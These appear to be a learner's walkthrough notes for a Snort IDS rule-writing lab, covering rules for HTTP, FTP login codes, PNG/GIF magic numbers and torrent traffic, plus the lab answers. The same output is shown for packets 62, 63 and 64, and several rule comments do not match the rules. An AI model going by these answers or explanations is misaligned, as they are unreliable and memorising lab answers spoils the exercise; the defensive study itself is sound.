SNORT CHALLENGE (BASICS)

WRITING IDS RULES: HTTP

Write a single rule to detect "all TCP port 80 traffic" packets in the given pcap file. What is the number of detected packets?

#write a rule based on specification - Snort 3 Rule Writing Guide
root@thm:~$ BROWSER > https://docs.snort.org/welcome
 Search: searchWord
  - https://docs.snort.org/rules
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano /etc/snort/rules/local.rules
 alert tcp any any <> any 80 (msg:"All TCP port 80 traffic"; sid:1000001; rev:1;)

#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ snort -c local.rules -r mx-3.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert  local.rules  mx-3.pcap  snort.log.1735772343
root@thm:~$ cat alert
 [**] [1:1000001:1] All TCP port 80 traffic [**]
 [Priority: 0] 
root@thm:~$ grep [\[\*\*\]] alert | wc -l
 * 164

Write a single rule to detect "all TCP port 80 traffic" packets in the given pcap file then investigate the log file. What is the destination address of packet 63?

#write a rule based on specification - Snort 3 Rule Writing Guide
root@thm:~$ BROWSER > https://docs.snort.org/welcome
 Search: searchWord
  - https://docs.snort.org/rules
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano /etc/snort/rules/local.rules
 alert tcp any any <> any 80 (msg:"All TCP port 80 traffic"; sid:1000001; rev:1;)

#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ snort -c local.rules -r mx-3.pcap -A full -l .

#perform log analysis on the snort log file
root@thm:~$ ls
 alert  local.rules  mx-3.pcap  snort.log.1735772343
root@thm:~$ sudo snort -r snort.log.1735772343 -n 63
 * the -n option specifies the number of packets to process when reading a packet capture file
    - this cmd specifically limit Snort to processing the first 63 packets in the log file.
       - if there are fewer than 63 packets in the file, Snort will process all available packets
       
 * WARNING: No preprocessors configured for policy 0.
   05/13-10:17:10.295515 145.254.160.237:3371 -> 216.239.59.99:80
   TCP TTL:128 TOS:0x0 ID:3917 IpLen:20 DgmLen:761 DF
   ***AP*** Seq: 0x36C21E28  Ack: 0x2E6B5384  Win: 0x2238  TcpLen: 20
   =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Write a single rule to detect "all TCP port 80 traffic" packets in the given pcap file then investigate the log file. What is the ACK number of packet 64?

#write a rule based on specification - Snort 3 Rule Writing Guide
root@thm:~$ BROWSER > https://docs.snort.org/welcome
 Search: searchWord
  - https://docs.snort.org/rules
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano /etc/snort/rules/local.rules
 alert tcp any any <> any 80 (msg:"All TCP port 80 traffic"; sid:1000001; rev:1;)

#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ snort -c local.rules -r mx-3.pcap -A full -l .

#perform log analysis on the snort log file
root@thm:~$ ls
 alert  local.rules  mx-3.pcap  snort.log.1735772343
root@thm:~$ sudo snort -r snort.log.1735772343 -n 64
 * the -n option specifies the number of packets to process when reading a packet capture file
    - this cmd specifically limit Snort to processing the first 63 packets in the log file.
       - if there are fewer than 63 packets in the file, Snort will process all available packets
       
 * WARNING: No preprocessors configured for policy 0.
   05/13-10:17:10.295515 145.254.160.237:3371 -> 216.239.59.99:80
   TCP TTL:128 TOS:0x0 ID:3917 IpLen:20 DgmLen:761 DF
   ***AP*** Seq: 0x36C21E28  Ack: 0x2E6B5384  Win: 0x2238  TcpLen: 20
   =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Write a single rule to detect "all TCP port 80 traffic" packets in the given pcap file then investigate the log file. What is the SEQ number of packet 62?

#write a rule based on specification - Snort 3 Rule Writing Guide
root@thm:~$ BROWSER > https://docs.snort.org/welcome
 Search: searchWord
  - https://docs.snort.org/rules
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano /etc/snort/rules/local.rules
 alert tcp any any <> any 80 (msg:"All TCP port 80 traffic"; sid:1000001; rev:1;)

#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ snort -c local.rules -r mx-3.pcap -A full -l .

#perform log analysis on the snort log file
root@thm:~$ ls
 alert  local.rules  mx-3.pcap  snort.log.1735772343
root@thm:~$ sudo snort -r snort.log.1735772343 -n 62
 * the -n option specifies the number of packets to process when reading a packet capture file
    - this cmd specifically limit Snort to processing the first 63 packets in the log file.
       - if there are fewer than 63 packets in the file, Snort will process all available packets
       
 * WARNING: No preprocessors configured for policy 0.
   05/13-10:17:10.295515 145.254.160.237:3371 -> 216.239.59.99:80
   TCP TTL:128 TOS:0x0 ID:3917 IpLen:20 DgmLen:761 DF
   ***AP*** Seq: 0x36C21E28  Ack: 0x2E6B5384  Win: 0x2238  TcpLen: 20
   =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Write a single rule to detect "all TCP port 80 traffic" packets in the given pcap file then investigate the log file. What is the TTL of packet 65?

#write a rule based on specification - Snort 3 Rule Writing Guide
root@thm:~$ BROWSER > https://docs.snort.org/welcome
 Search: searchWord
  - https://docs.snort.org/rules
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano /etc/snort/rules/local.rules
 alert tcp any any <> any 80 (msg:"All TCP port 80 traffic"; sid:1000001; rev:1;)

#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ snort -c local.rules -r mx-3.pcap -A full -l .

#perform log analysis on the snort log file
root@thm:~$ ls
 alert  local.rules  mx-3.pcap  snort.log.1735772343
root@thm:~$ sudo snort -r snort.log.1735772343 -n 65
 * the -n option specifies the number of packets to process when reading a packet capture file
    - this cmd specifically limit Snort to processing the first 63 packets in the log file.
       - if there are fewer than 63 packets in the file, Snort will process all available packets
       
 * WARNING: No preprocessors configured for policy 0.
   05/13-10:17:10.325558 145.254.160.237:3372 -> 65.208.228.223:80
   TCP TTL:128 TOS:0x0 ID:3918 IpLen:20 DgmLen:40 DF
   ***A**** Seq: 0x38AFFFF3  Ack: 0x114C81E4  Win: 0x25BC  TcpLen: 20
   =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Write a single rule to detect "all TCP port 80 traffic" packets in the given pcap file then investigate the log file. What is the source IP of packet 65?

#write a rule based on specification - Snort 3 Rule Writing Guide
root@thm:~$ BROWSER > https://docs.snort.org/welcome
 Search: searchWord
  - https://docs.snort.org/rules
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano /etc/snort/rules/local.rules
 alert tcp any any <> any 80 (msg:"All TCP port 80 traffic"; sid:1000001; rev:1;)

#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ snort -c local.rules -r mx-3.pcap -A full -l .

#perform log analysis on the snort log file
root@thm:~$ ls
 alert  local.rules  mx-3.pcap  snort.log.1735772343
root@thm:~$ sudo snort -r snort.log.1735772343 -n 65
 * the -n option specifies the number of packets to process when reading a packet capture file
    - this cmd specifically limit Snort to processing the first 63 packets in the log file.
       - if there are fewer than 63 packets in the file, Snort will process all available packets
       
 * WARNING: No preprocessors configured for policy 0.
   05/13-10:17:10.325558 145.254.160.237:3372 -> 65.208.228.223:80
   TCP TTL:128 TOS:0x0 ID:3918 IpLen:20 DgmLen:40 DF
   ***A**** Seq: 0x38AFFFF3  Ack: 0x114C81E4  Win: 0x25BC  TcpLen: 20
   =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Write a single rule to detect "all TCP port 80 traffic" packets in the given pcap file then investigate the log file. What is the source port of packet 65?

#write a rule based on specification - Snort 3 Rule Writing Guide
root@thm:~$ BROWSER > https://docs.snort.org/welcome
 Search: searchWord
  - https://docs.snort.org/rules
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano /etc/snort/rules/local.rules
 alert tcp any any <> any 80 (msg:"All TCP port 80 traffic"; sid:1000001; rev:1;)

#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ snort -c local.rules -r mx-3.pcap -A full -l .

#perform log analysis on the snort log file
root@thm:~$ ls
 alert  local.rules  mx-3.pcap  snort.log.1735772343
root@thm:~$ sudo snort -r snort.log.1735772343 -n 65
 * the -n option specifies the number of packets to process when reading a packet capture file
    - this cmd specifically limit Snort to processing the first 63 packets in the log file.
       - if there are fewer than 63 packets in the file, Snort will process all available packets
       
 * WARNING: No preprocessors configured for policy 0.
   05/13-10:17:10.325558 145.254.160.237:3372 -> 65.208.228.223:80
   TCP TTL:128 TOS:0x0 ID:3918 IpLen:20 DgmLen:40 DF
   ***A**** Seq: 0x38AFFFF3  Ack: 0x114C81E4  Win: 0x25BC  TcpLen: 20
   =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

WRITING IDS RULES: FTP

Write a single rule to detect "all TCP port 21" traffic in the given pcap. What is the number of detected packets?

#write a rule based on specification - Snort 3 Rule Writing Guide
root@thm:~$ BROWSER > https://docs.snort.org/welcome
 Search: port
  - https://docs.snort.org/rules/headers/ports?highlight=port#port-numbers
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano /etc/snort/rules/local.rules
 alert tcp any any <> any 21 (msg:"All TCP port 21 traffic"; sid:1000001; rev:1;)

#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ cd "Desktop/Exercise-Files/TASK-3 (FTP)"
root@dco:~$ ls 
 ftp-png-gif.pcap  local.rules
root@dco:~$ snort -c local.rules -r ftp-png-gif.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert  ftp-png-gif.pcap  local.rules  snort.log.1735844872
root@thm:~$ cat alert
 [**] [1:1000001:1] All TCP port 21 traffic [**]
 [Priority: 0]  
root@thm:~$ grep [\[\*\*\]] alert | wc -l
 * 307

Write a single rule to detect "all TCP port 21" traffic in the given pcap then Investigate the log file. What is the FTP service name?

#write a rule based on specification - Snort 3 Rule Writing Guide
root@thm:~$ BROWSER > https://docs.snort.org/welcome
 Search: port
  - https://docs.snort.org/rules/headers/ports?highlight=port#port-numbers
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano /etc/snort/rules/local.rules
 alert tcp any any <> any 21 (msg:"All TCP port 21 traffic"; sid:1000001; rev:1;)

#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ cd "Desktop/Exercise-Files/TASK-3 (FTP)"
root@dco:~$ ls 
 ftp-png-gif.pcap  local.rules
root@dco:~$ snort -c local.rules -r ftp-png-gif.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert  ftp-png-gif.pcap  local.rules  snort.log.1735844872
root@thm:~$ strings snort.log.1735844872 | grep -E "(S|s)ervice"
 220 Microsoft FTP Service

Write a rule to detect failed FTP login attempts in the given pcap. What is the number of detected packets?

#write a rule based on specification - Snort 3 Rule Writing Guide
root@thm:~$ BROWSER > https://docs.snort.org/welcome
 Search: ftp
  - https://docs.snort.org/rules
root@thm:~$ BROWSER > chatGpt.com
 Query: list of FTP codes with description
 ...
 530 Not logged in. Authentication failed.
 
root@thm:~$ strings ftp-png-gif.pcap | grep 530
 530 User admin cannot log in.
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano /etc/snort/rules/local.rules
 alert tcp any any <> any 21 (msg:"FTP Failed Login"; content:"530 "; depth:4; sid:1000001; rev:1;)
  - content: The string to match in the payload. "530" is a common response code for failed logins in FTP.
  - depth: Restricts the search to the first 4 bytes of the payload to ensure precision
  
#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ cd "Desktop/Exercise-Files/TASK-3 (FTP)"
root@dco:~$ ls 
 ftp-png-gif.pcap  local.rules
root@dco:~$ snort -c local.rules -r ftp-png-gif.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert  ftp-png-gif.pcap  local.rules  snort.log.1735844872
root@thm:~$ strings snort.log.1735844872
 ...
 530 User test cannot log in.
root@thm:~$ grep -E [\[\*\*\]] alert | wc -l
 41

Write a rule to detect successful FTP logins in the given pcap. What is the number of detected packets?

#write a rule based on specification - Snort 3 Rule Writing Guide
root@thm:~$ BROWSER > https://docs.snort.org/welcome
 Search: ftp
  - https://docs.snort.org/rules
root@thm:~$ BROWSER > chatGpt.com
 Query: list of FTP codes
 ...
 230 User logged in, proceed. Authentication successful.
 
root@thm:~$ strings ftp-png-gif.pcap | grep 230
 230 User Administrator logged in.

#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano /etc/snort/rules/local.rules
 alert tcp any any <> any 21 (msg:"FTP Successful Login"; content:"230 "; depth:4; sid:1000001; rev:1;)
  - content: The string to match in the payload. "230" is a common response code for successful logins in FTP.
  - depth: Restricts the search to the first 4 bytes of the payload to ensure precision
  
#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ cd "Desktop/Exercise-Files/TASK-3 (FTP)"
root@dco:~$ ls 
 ftp-png-gif.pcap  local.rules
root@dco:~$ snort -c local.rules -r ftp-png-gif.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert  ftp-png-gif.pcap  local.rules  snort.log.1735844872
root@thm:~$ strings snort.log.1735844872
 ...
 230 User Administrator logged in.
root@thm:~$ grep -E [\[\*\*\]] alert | wc -l
 1

Write a rule to detect FTP login attempts with a valid username but no password entered yet. What is the number of detected packets?

#write a rule based on specification - Snort 3 Rule Writing Guide
root@thm:~$ BROWSER > https://docs.snort.org/welcome
 Search: ftp
  - https://docs.snort.org/rules
root@thm:~$ BROWSER > chatGpt.com
 Query: list of FTP codes
 ...
 331 User name okay; need password.

root@thm:~$ strings ftp-png-gif.pcap | grep 331
 331 Password required for Administrator.
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano /etc/snort/rules/local.rules
 alert tcp any any <> any 21 (msg:"FTP login w/o password"; content:"331 "; depth:4; sid:1000001; rev:1;)
  - content: The string to match in the payload - "331"
  - depth: Restricts the search to the first 4 bytes of the payload to ensure precision

#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ cd "Desktop/Exercise-Files/TASK-3 (FTP)"
root@dco:~$ ls 
 ftp-png-gif.pcap  local.rules
root@dco:~$ snort -c local.rules -r ftp-png-gif.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert  ftp-png-gif.pcap  local.rules  snort.log.1735844872
root@thm:~$ strings snort.log.1735844872
 ...
 331 Password required for napier.
root@thm:~$ grep -E [\[\*\*\]] alert | wc -l
 42

Write a rule to detect FTP login attempts with the "Administrator" username but no password entered yet. What is the number of detected packets?

#write a rule based on specification - Snort 3 Rule Writing Guide
root@thm:~$ BROWSER > https://docs.snort.org/welcome
 Search: ftp
  - https://docs.snort.org/rules
root@thm:~$ BROWSER > chatGpt.com
 Query: list of FTP codes
 ...
 331 User name okay; need password.

root@thm:~$ strings ftp-png-gif.pcap | grep 331
 331 Password required for Administrator.
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano /etc/snort/rules/local.rules
 alert tcp any any <> any 21 (msg:"FTP login w/o password"; content:"331 "; depth:4; content:"Administrator"; sid:1000001; rev:1;)
  - content: The string to match in the payload - "331"
     - the content field can be used more than once
  - depth: Restricts the search to the first 4 bytes of the payload to ensure precision

#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ cd "Desktop/Exercise-Files/TASK-3 (FTP)"
root@dco:~$ ls 
 ftp-png-gif.pcap  local.rules
root@dco:~$ snort -c local.rules -r ftp-png-gif.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert  ftp-png-gif.pcap  local.rules  snort.log.1735844872
root@thm:~$ strings snort.log.1735844872
 ...
 331 Password required for Administrator.
root@thm:~$ grep -E [\[\*\*\]] alert | wc -l
 7

WRITING IDS RULES: PNG

Write a rule to detect the PNG file in the given pcap. Investigate the logs and identify the software name embedded in the packet.

#write a rule based on specification - Snort 3 Rule Writing Guide
root@thm:~$ BROWSER > https://docs.snort.org/welcome
 Search: png
  - none found
root@thm:~$ BROWSER > chatGpt.com
 Query: file type magic numbers
 ...
 PNG: 89 50 4E 47 0D 0A 1A 0A
 
root@thm:~$ strings ftp-png-gif.pcap | grep png
 GET /h4base/0.209.1/img/apple-touch-icon.png HTTP/1.1
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano /etc/snort/rules/local.rules
 alert tcp any any <> any any (msg:"PNG Files Detected"; content:"|89 50 4E 47 0D 0A 1A 0A|"; depth:8; sid:100001; rev:1;)
  - content: The string to match in the payload - "|89 50 4E 47 0D 0A 1A 0A|"
     - the content field can be used more than once
     - when identifying files it is highly recommended to use the files magic numbers for identification
  - depth: Restricts the search to the first 8 bytes of the payload to ensure precision
     - the magic number (aka file identification type) is found within the first serveral bytes of the packet

#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ cd "Desktop/Exercise-Files/TASK-4 (PNG)"
root@dco:~$ ls 
 ftp-png-gif.pcap  local.rules
root@dco:~$ snort -c local.rules -r ftp-png-gif.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert  ftp-png-gif.pcap  local.rules  snort.log.1735844872
root@thm:~$ strings snort.log.1735844872
 ...
 Adobe ImageReadyq

Write a rule to detect the GIF file in the given pcap. Investigate the logs and identify the image format embedded in the packet.

#write a rule based on specification - Snort 3 Rule Writing Guide
root@thm:~$ BROWSER > https://docs.snort.org/welcome
 Search: gif
  - none found
root@thm:~$ BROWSER > chatGpt.com
 Query: file type magic numbers
 ...
 GIF: 47 49 46 38 37 61
 
root@thm:~$ strings ftp-png-gif.pcap | grep gif
 Content-Type: image/gif
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano /etc/snort/rules/local.rules
 alert tcp any any -> any any (msg:"GIF Files Detected"; content:"|47 49 46 38|"; depth:4; content:"|37 61|"; distance:0; within:2; sid:100001; rev:2;)
 alert tcp any any -> any any (msg:"GIF Files Detected"; content:"|47 49 46 38|"; depth:4; content:"|39 61|"; distance:0; within:2; sid:100002; rev:2;)
  - content: The string to match in the payload - "|47 49 46 38|" which can identify both gif87a & git89a
     - the content field can be used more than once
     - when identifying files it is highly recommended to use the files magic numbers for identification
  - depth: Restricts the search to the first 6 bytes of the payload to ensure precision
     - the magic number (aka file identification type) is found within the first serveral bytes of the packet

#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ cd "Desktop/Exercise-Files/TASK-4 (PNG)"
root@dco:~$ ls 
 ftp-png-gif.pcap  local.rules
root@dco:~$ snort -c local.rules -r ftp-png-gif.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert  ftp-png-gif.pcap  local.rules  snort.log.1735844872
root@thm:~$ cat alert
 ...
 GIF89a

WRITING IDS RULES: TORRENT METAFILE

Write a rule to detect the torrent metafile in the given pcap. What is the number of detected packets?

#write a rule based on specification - Snort 3 Rule Writing Guide
root@thm:~$ BROWSER > https://docs.snort.org/welcome
 Search: torrent
  - none found
root@thm:~$ BROWSER > chatGpt.com
 Query: torrent file magic number
 ...
 .torrent files are plain text-like and follow the bencode format, they do not have a binary magic number
 these torrent files start with a d character, which indicates the beginning of a dictionary in bencode.
 key characteristics: d8:announce and .torrent
 
root@thm:~$ strings torrent.pcap
 GET /announce?info_hash=%01d%FE...
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano /etc/snort/rules/local.rules
 alert tcp any any -> any any (msg:"Possible .torrent file transfer"; content:".torrent"; nocase; distance:0; sid:100001; rev:2;)
  - content:".torrent"; nocase; Searches for .torrent anywhere in the payload, case-insensitively.
     - the content field can be used more than once
     - when identifying binary files it is highly recommended to use the files magic numbers for identification
  - depth: Restricts the search to the first 10 bytes of the payload to ensure precision
     - the magic number (aka file identification type) is found within the first serveral bytes of the packet
  - distance:0: Ensures the second content (.torrent) is searched immediately after the first match (announce). Adjust distance if the two patterns are expected to appear with a gap.

#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ cd "Desktop/Exercise-Files/TASK-4 (PNG)"
root@dco:~$ ls 
 local.rules  torrent.pcap
root@dco:~$ snort -c local.rules -r torrent.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert  local.rules  snort.log.1736016370  torrent.pcap
root@thm:~$ cat alert
 ...
 [**] [1:100001:2] Possible .torrent file transfer [**]
root@thm:~$ grep -E [\[\*\*\]] alert | wc -l
 2

Write a rule to detect the torrent metafile in the given pcap. What is the name of the torrent application?

#write a rule based on specification - Snort 3 Rule Writing Guide
root@thm:~$ BROWSER > https://docs.snort.org/welcome
 Search: torrent
  - none found
root@thm:~$ BROWSER > chatGpt.com
 Query: torrent file magic number
 ...
 .torrent files are plain text-like and follow the bencode format, they do not have a binary magic number
 these torrent files start with a d character, which indicates the beginning of a dictionary in bencode.
 key characteristics: d8:announce and .torrent
 
root@thm:~$ strings torrent.pcap
 GET /announce?info_hash=%01d%FE...
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano /etc/snort/rules/local.rules
 alert tcp any any -> any any (msg:"Possible .torrent file transfer"; content:".torrent"; nocase; distance:0; sid:100001; rev:2;)
  - content:".torrent"; nocase; Searches for .torrent anywhere in the payload, case-insensitively.
     - the content field can be used more than once
     - when identifying binary files it is highly recommended to use the files magic numbers for identification
  - depth: Restricts the search to the first 10 bytes of the payload to ensure precision
     - the magic number (aka file identification type) is found within the first serveral bytes of the packet
  - distance:0: Ensures the second content (.torrent) is searched immediately after the first match (announce). Adjust distance if the two patterns are expected to appear with a gap.

#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ cd "Desktop/Exercise-Files/TASK-4 (PNG)"
root@dco:~$ ls 
 local.rules  torrent.pcap
root@dco:~$ snort -c local.rules -r torrent.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert  local.rules  snort.log.1736016370  torrent.pcap
root@thm:~$ cat alert
 ...
 [**] [1:100001:2] Possible .torrent file transfer [**]
root@thm:~$ trings snort.log.1736016370 
 GET /announce?info_hash=%01d%FE%7E%F1%10%5CWvAp%ED%F6%03%C49%D6B%14%F1&peer_id=%B8js%7F%E8%0C%AFh%02Y%967%24e%27V%EEM%16%5B&port=41730&uploaded=0&downloaded=0&left=3767869&compact=1&ip=127.0.0.1&event=started HTTP/1.1
 Accept: application/x-bittorrent
 Accept-Encoding: gzip
 User-Agent: RAZA 2.1.0.0
 Host: tracker2.torrentbox.com:2710
 Connection: Keep-Alive

Write a rule to detect the torrent metafile in the given pcap. What is the MIME (Multipurpose Internet Mail Extensions) type of the torrent metafile?

#write a rule based on specification - Snort 3 Rule Writing Guide
root@thm:~$ BROWSER > https://docs.snort.org/welcome
 Search: torrent
  - none found
root@thm:~$ BROWSER > chatGpt.com
 Query: torrent file magic number
 ...
 .torrent files are plain text-like and follow the bencode format, they do not have a binary magic number
 these torrent files start with a d character, which indicates the beginning of a dictionary in bencode.
 key characteristics: d8:announce and .torrent
 
root@thm:~$ strings torrent.pcap
 GET /announce?info_hash=%01d%FE...
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano /etc/snort/rules/local.rules
 alert tcp any any -> any any (msg:"Possible .torrent file transfer"; content:".torrent"; nocase; distance:0; sid:100001; rev:2;)
  - content:".torrent"; nocase; Searches for .torrent anywhere in the payload, case-insensitively.
     - the content field can be used more than once
     - when identifying binary files it is highly recommended to use the files magic numbers for identification
  - depth: Restricts the search to the first 10 bytes of the payload to ensure precision
     - the magic number (aka file identification type) is found within the first serveral bytes of the packet
  - distance:0: Ensures the second content (.torrent) is searched immediately after the first match (announce). Adjust distance if the two patterns are expected to appear with a gap.

#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ cd "Desktop/Exercise-Files/TASK-4 (PNG)"
root@dco:~$ ls 
 local.rules  torrent.pcap
root@dco:~$ snort -c local.rules -r torrent.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert  local.rules  snort.log.1736016370  torrent.pcap
root@thm:~$ cat alert
 ...
 [**] [1:100001:2] Possible .torrent file transfer [**]
root@thm:~$ trings snort.log.1736016370 
 GET /announce?info_hash=%01d%FE%7E%F1%10%5CWvAp%ED%F6%03%C49%D6B%14%F1&peer_id=%B8js%7F%E8%0C%AFh%02Y%967%24e%27V%EEM%16%5B&port=41730&uploaded=0&downloaded=0&left=3767869&compact=1&ip=127.0.0.1&event=started HTTP/1.1
 Accept: application/x-bittorrent
 Accept-Encoding: gzip
 User-Agent: RAZA 2.1.0.0
 Host: tracker2.torrentbox.com:2710
 Connection: Keep-Alive

Write a rule to detect the torrent metafile in the given pcap. What is the hostname of the torrent metafile?

#write a rule based on specification - Snort 3 Rule Writing Guide
root@thm:~$ BROWSER > https://docs.snort.org/welcome
 Search: torrent
  - none found
root@thm:~$ BROWSER > chatGpt.com
 Query: torrent file magic number
 ...
 .torrent files are plain text-like and follow the bencode format, they do not have a binary magic number
 these torrent files start with a d character, which indicates the beginning of a dictionary in bencode.
 key characteristics: d8:announce and .torrent
 
root@thm:~$ strings torrent.pcap
 GET /announce?info_hash=%01d%FE...
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano /etc/snort/rules/local.rules
 alert tcp any any -> any any (msg:"Possible .torrent file transfer"; content:".torrent"; nocase; distance:0; sid:100001; rev:2;)
  - content:".torrent"; nocase; Searches for .torrent anywhere in the payload, case-insensitively.
     - the content field can be used more than once
     - when identifying binary files it is highly recommended to use the files magic numbers for identification
  - depth: Restricts the search to the first 10 bytes of the payload to ensure precision
     - the magic number (aka file identification type) is found within the first serveral bytes of the packet
  - distance:0: Ensures the second content (.torrent) is searched immediately after the first match (announce). Adjust distance if the two patterns are expected to appear with a gap.

#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ cd "Desktop/Exercise-Files/TASK-4 (PNG)"
root@dco:~$ ls 
 local.rules  torrent.pcap
root@dco:~$ snort -c local.rules -r torrent.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert  local.rules  snort.log.1736016370  torrent.pcap
root@thm:~$ cat alert
 ...
 [**] [1:100001:2] Possible .torrent file transfer [**]
root@thm:~$ strings snort.log.1736016370 
 GET /announce?info_hash=%01d%FE%7E%F1%10%5CWvAp%ED%F6%03%C49%D6B%14%F1&peer_id=%B8js%7F%E8%0C%AFh%02Y%967%24e%27V%EEM%16%5B&port=41730&uploaded=0&downloaded=0&left=3767869&compact=1&ip=127.0.0.1&event=started HTTP/1.1
 Accept: application/x-bittorrent
 Accept-Encoding: gzip
 User-Agent: RAZA 2.1.0.0
 Host: tracker2.torrentbox.com:2710
 Connection: Keep-Alive

TROUBLESHOOTING RULE SYNTAX ERRORS

Fix the syntax error in local-1.rules file and make it work smoothly. What is the number of the detected packets?

root@dco:~$ cd "/Desktop/Exercise-Files/TASK-6 (Troubleshooting)"
root@dco:~$ ls
 local-1.rules  local-3.rules  local-5.rules  local-7.rules
 local-2.rules  local-4.rules  local-6.rules  mx-1.pcap
root@dco:~$ cat local-1.rules
 alert tcp any 3372 -> any any(msg: "Troubleshooting 1"; sid:1000001; rev:1;)
